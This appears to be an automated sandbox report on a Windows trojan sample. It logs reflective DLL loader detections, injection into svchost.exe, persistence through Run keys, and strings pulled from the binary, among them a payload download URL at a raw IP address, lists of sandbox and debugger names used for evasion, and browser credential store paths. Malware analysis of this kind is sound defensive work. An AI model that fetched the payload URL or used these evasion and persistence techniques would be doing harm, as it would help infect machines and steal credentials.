Source: 00000003.00000002.3327889570.0000000011050000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000000.2101572889.0000000003350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: classification engine Classification label: mal100.phis.troj.adwa.spyw.evad.winEXE@21/64@0/1
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Code function: 10_2_00007FF779E929E0 GetLastError,FormatMessageW,MessageBoxW, 10_2_00007FF779E929E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF945AE0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle, 0_2_00007FF6CF945AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF943474 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 0_2_00007FF6CF943474
Source: C:\Windows\explorer.exe Code function: 3_2_08B7C9C4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 3_2_08B7C9C4
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA5AE0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle, 4_2_00007FF6BCCA5AE0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: 4_2_00007FF6BCCA3474 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 4_2_00007FF6BCCA3474
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA63474 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 5_2_00007FF78FA63474
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00007FF78FA65AE0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle, 5_2_00007FF78FA65AE0
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B3474 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 9_2_00007FF7A34B3474
Source: C:\Windows\System32\svchost.exe Code function: 9_2_00007FF7A34B5AE0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle, 9_2_00007FF7A34B5AE0
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F553474 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle, 13_2_00007FF67F553474
Source: C:\Windows\System32\svchost.exe Code function: 13_2_00007FF67F555AE0 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,AdjustTokenPrivileges,CloseHandle, 13_2_00007FF67F555AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF946404 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00007FF6CF946404
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF945E58 CoInitializeEx,SHGetFolderPathW,CoCreateInstance,CoUninitialize, 0_2_00007FF6CF945E58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Mutant created: NULL
Source: C:\Windows\System32\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\ZBI
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File created: C:\Users\user\AppData\Local\Temp\TH2197.tmp Jump to behavior
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, 5BB2.tmp.x.exe, 00000006.00000002.2514168774.0000000002FBC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe ReversingLabs: Detection: 63%
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: {B268D441C1ED2974164258}.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: svchost.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe String found in binary or memory: invalid string positionstring too longwcscpymsvcrt.dllwcscatwcscmpwcsncpywcslenstrlenreallocfreewcsstrCloseHandlekernel32.dllCreateFileWFreeLibraryMoveFileWGetFileSizeExGetWindowsDirectoryAGetVolumeInformationAGetTickCountwsprintfWuser32.dllwsprintfAVirtualAllocReadFileSleepVirtualFreeSetFilePointerCreateDirectoryWFindFirstFileWFindNextFileWFindCloseCopyFileWWriteFileGetSystemDirectoryWExitProcessCreateProcessWShellExecuteWshell32.dllGetModuleFileNameWGetShortPathNameWGetEnvironmentVariableWInternetOpenWwininet.dllInternetOpenUrlWHttpQueryInfoAInternetReadFileInternetConnectWHttpOpenRequestWHttpSendRequestAInternetCloseHandleSHGetFolderPathWSHGetFolderPathASHGetKnownFolderPathPathIsURLWshlwapi.dllPathCombineWPathFindFileNameWRegDeleteKeyWAdvapi32.dllRegOpenKeyExARegSetValueExARegCloseKeyOpenProcessTokenGetTokenInformationAdjustTokenPrivilegesGetUserNameWLookupPrivilegeValueACoUninitializeole32.dllCoCreateInstanceCoInitializeMessageBoxAMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3SeDebugPrivilegevector<T> too longReflectiveLoaderSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\RunSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolderProcessHacker.exeprocexp.exeprocexp64.exeTOTALCMD.exex64dbg.exehttp://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeMicrosoftEdgeUpdatebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set%SystemRoot%\system32\svchost.exegeorgeAbbyDarrel JonesJohnJohn ZalinskyJohn DoeSHCtAGa3rmUV0U6479boGY8wjXNBzWALKERoxYT3lZggZMKt3wObOwwaWuh6PNjaakw.qsMdVVcp06AAy3mLfaNLLPJPQlavKFb0Lt07HV8BUt5BIsCZaFgxGd9fq4Iv8FrankAnnawdagutilityaccountWDAGUtilityAccounthal9thvirusmalwaresandboxsamplecurrentuseremilyhapubwshong leeit-adminjohnsonmillermilozsmicrosoftsand boxmaltestPaul JonesvmrayDiamotrix{%08lX%04lX%lu}ZBI\.exe.lnk\Software\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHiddenServicesUnknown.firefox.exeexplorer.exe\MRT.exe\Mozilla\Firefox\Profiles\*release\drivers\etc\hostsvirustotal
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe"
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe "C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe"
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe"
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Process created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe"
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe "C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe "C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Process created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe"
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: msvcp140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: libffi-7.dll
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wininet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32 Jump to behavior
